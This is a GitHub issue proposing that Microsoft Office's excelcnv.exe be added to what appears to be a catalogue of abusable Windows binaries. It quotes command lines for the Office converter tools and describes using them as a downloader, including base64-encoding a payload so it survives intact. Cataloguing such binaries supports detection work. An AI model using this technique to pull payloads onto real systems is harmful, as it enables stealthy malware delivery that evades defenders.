Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Consider excelnv.exe for addition #138

Open
moshekaplan opened this issue May 24, 2021 · 0 comments
Open

Consider excelnv.exe for addition #138

moshekaplan opened this issue May 24, 2021 · 0 comments

Comments

@moshekaplan
Copy link
Contributor

moshekaplan commented May 24, 2021

Source: https://twitter.com/Hexacorn/status/1396536863498907654

C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe accepts URL so you can use it as a downloader

excelcnv.exe -oice

caveat? your download will be saved as an XLSX and binary data will be stored encoded with UTF8 inside xl\sharedStrings.xml

Also from https://gist.github.com/AhnSeongHyun/3372088:

Word:
"C:\Program Files\Microsoft Office\Office12\wordconv.exe" -oice -nme

Excel:
"C:\Program Files\Microsoft Office\Office12\excelcnv.exe" -oice

PowerPoint:
"C:\Program Files\Microsoft Office\Office12\ppcnvcom.exe" -oice

예) PPCNVCOM.EXE -oice C:\b.ppt C:\b.pptx

Note that it appears to do preprocessing, so the payload may need to be base64 encoded to ensure it's not modified

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants